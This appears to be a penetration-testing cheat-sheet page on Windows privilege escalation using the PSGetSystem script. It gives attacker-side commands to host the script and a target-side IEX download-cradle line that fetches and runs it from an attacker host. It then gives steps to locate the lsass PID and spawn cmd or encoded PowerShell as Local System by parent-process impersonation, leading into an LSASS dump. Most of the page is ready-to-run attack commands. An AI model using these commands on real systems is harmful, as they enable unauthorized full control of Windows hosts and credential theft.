PRIMARY CATEGORY β WINDOWS PRIVESC
Theory
RCE as Local System
PSGetSystem
Setup
- From the Attacker βοΈ
curl --silent --location --request GET "https://github.com/decoder-it/psgetsystem/raw/refs/heads/master/psgetsys.ps1" --remote-namepython3 -m http.server 80- From the Target π―
IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER>/psgetsys.ps1')Process PID as Local System
Once we have imported the powerhsell functionality into our current session, we have to locate a system process running as Local System
A non-privileged system account usually does not have enough privileges to list the owner of each existing process
However, there are several know processes in a Windows system that are known to always run as Local System, such the lsass process
Therefore, we can list the details of one of them to obtain its PID
( Get-Process | ? { $_.ProcessName -eq '<PROCESS_NAME>' } ).Ide.g.
( Get-Process | ? { $_.ProcessName -eq 'lsass' } ).Id
Command Execution
With the required PID, we can run the command below to spawn a new child process of the latter, which will be executed as Local System
Remember that seDebugPrivilege allows an arbitrary process, such as cmd.exe, to debug any non-protected process, being able to read and write to the memory space of the latter
And thatβs actually what we are doing here
ImpersonateFromParentPid -ppid <PARENT_PID> -command "<COMMAND>" -cmdargs "<COMMAND_ARGS>"e.g.
ImpersonateFromParentPid -ppid <PARENT_PID> -command "C:\Windows\System32\cmd.exe" -cmdargs "/c powershell.exe -EncodedCommand <BASE64_STRING>"
LSASS Dump
See here for memory data exfiltration on Windows